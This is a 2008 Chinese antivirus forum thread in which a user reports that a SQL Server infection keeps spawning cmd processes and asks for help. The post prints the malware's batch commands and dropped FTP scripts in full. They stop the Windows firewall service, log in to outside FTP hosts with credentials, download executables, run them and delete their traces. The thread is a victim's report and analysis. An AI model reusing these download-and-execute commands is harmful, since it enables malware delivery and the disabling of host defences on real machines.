瑞星卡卡安全论坛

首页 » 企业产品讨论区 » 瑞星2009公测 » 瑞星2009测试版问题反馈 » 瑞星杀毒软件2009公测 » cmd病毒没有办法解决(只要恢复SQL数据)就出现CMD进程
cmd病毒 - 2008-10-26 12:22:00
cmd进程病毒
最近老是发现自动增加很多cmd进程,它们也不增加系统资源,但是杀死这个进程后不久又会自动添加上来。通过跟踪和观察发现这些cmd进程sqlserver进程生成的。这些cmd进程执行如下两个批处理代码
第一个:
"C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess
&echo open 61.160.212.45>dboy.sys
&echo wunai>>dboy.sys
&echo wunai$>>dboy.sys
&echo get ver.exe C:\boots.exe>>dboy.sys
&echo bye>>dboy.sys
&echo ftp -s:dboy.sys>dboy.bat
&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe
&echo start start /high "" C:\WINDOWS\system32\inf\test.exe
&echo start C:\boots.exe>>dboy.bat
&echo start C:\boots.exe>>dboy.bat
&echo del dboy.sys>>dboy.bat
&echo del %0>>dboy.bat&dboy.bat
第二个
"C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess
&echo open ddosboy1.3322.org >dboy1.sys
&echo dboy>>dboy1.sys
&echo if>>dboy1.sys
&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys
&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat
&system1.bat
这很明显是病毒通过cmd批处理调用dboy.sys。
经查系统system32下有dboy.sys和dboy1.sys,另外还有一个dboy.bat
这两个文件的代码如下
第一个:
open 218.61.11.180
12369
14789
get wm.exe C:\boots.exe
bye
第二个:
open ddosboy1.3322.org
dboy
if
get dboy1.exe C:\Windows\tcpsrv1.exe
bye
第三个bat文件
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0
然后c盘根目录拷贝boots.exe到c:\WINDOWS\system32\inf\test.exe
然后运行这个test.exe文件
在上面代码中提到的这些文件test.exe、boots.exe、tcpsrv1.exe、system1.bat都没有发现。
我分析可能是病毒在copy过程中被杀毒软件阻止,然后上述这些文件就没有生成,但是执行copy任务的批处理cmd却滞留在了进程中。
所以我可以在进程中发现他们的踪迹。
我用nod32可以控制不弹出广告。。。但病毒始终在任务管理器进程里。。杀不掉。。。有20多个CMD进程

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; CIBA; .NET CLR 2.0.50727)
xiaoyao2008 - 2008-10-26 12:47:00
将相关进程文件在“瑞星2009版查杀引擎测试 ”板块上报,上报地址:http://bbs.ikaka.com/showforum-20022.aspx
1
查看完整版本: cmd病毒没有办法解决(只要恢复SQL数据)就出现CMD进程